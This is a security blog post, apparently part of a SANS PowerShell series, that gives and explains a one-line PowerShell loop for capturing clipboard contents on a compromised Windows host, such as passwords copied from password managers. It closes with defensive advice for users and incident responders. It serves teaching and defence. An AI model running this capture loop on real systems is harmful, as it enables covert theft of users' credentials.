Month of PowerShell: Abusing Get-Clipboard

#monthofpowershell

Quick article today about one of my favorite tools to use in a penetration test or red-team engagement after exploiting a Windows 10 system: [code]Get-Clipboard[/code].

[code]Get-Clipboard[/code] retrieves the contents of the clipboard. It sounds pretty straightforward, but it can also be a big information disclosure threat. An attacker can gets access to the logged-in user session can setup a loop to capture and display the clipboard contents every time it changes. Here the 1-line PowerShell clipboard script I use:

$x=""; while($true) { $y=get-clipboard -raw; if ($x -ne $y) { Write-Host $y; $x=$y } ; Sleep 1 }

Let's break down this 1-line script piece-by-piece:

• [code]$x="";[/code]: Declare an empty variable [code]$x[/code]; we'll use this to hold the contents of the clipboard
• [code]while($true) {[/code]: Start a look that continues until interrupted
• [code]$y=get-clipboard -raw;[/code]: Get the contents of the clipboard, storing it in [code]$y[/code]; the [code]-Raw[/code] argument returns multiline clipboard contents as a single string instead of an array
• [code]if ($x -ne $y) {[/code]: If the [code]$y[/code] clipboard contents is different than what we saw in [code]$x[/code], then execute the following block of statements.
• [code]Write-Host $y;[/code]: Write the new clipboard contents to the host (screen)
• [code]$x=$y[/code]: Set [code]$x[/code] to be equal to [code]$y[/code] so we don't print the changed clipboard contents more than once
• [code]} ;[/code]: End the earlier [code]if[/code] block
• [code]Sleep 1[/code]: Wait 1 second before checking the clipboard again
• [code]}[/code]: End the earlier [code]while($true)[/code] loop

Running this command on a Windows host will reveal anything copied into the clipboard, but it particularly useful when the victim uses a password manager.

Password managers often make use of the clipboard to share password information between applications. Many clipboard managers will clear a password from the clipboard after a few minutes to prevent it from being disclosed, but an active attacker can interrogate the clipboard for password information very quickly.

Here's an example of this script in use on a macOS system against the 1Password password manager.

Attacks against the clipboard aren't new, and affects a lot of platforms. Where possible, avoid using the clipboard for sensitive data like passwords (use the password manager browser plugin where possible, for example). Otherwise, recognize the clipboard as a weak point in most operating systems, and conduct your incident response investigations accordingly.

-Joshua Wright

Return to Getting Started With PowerShell

Joshua Wright is the author of SANS SEC504: Hacker Tools, Techniques, and Incident Handling, a faculty fellow for the SANS Institute, and a senior technical director at Counter Hack.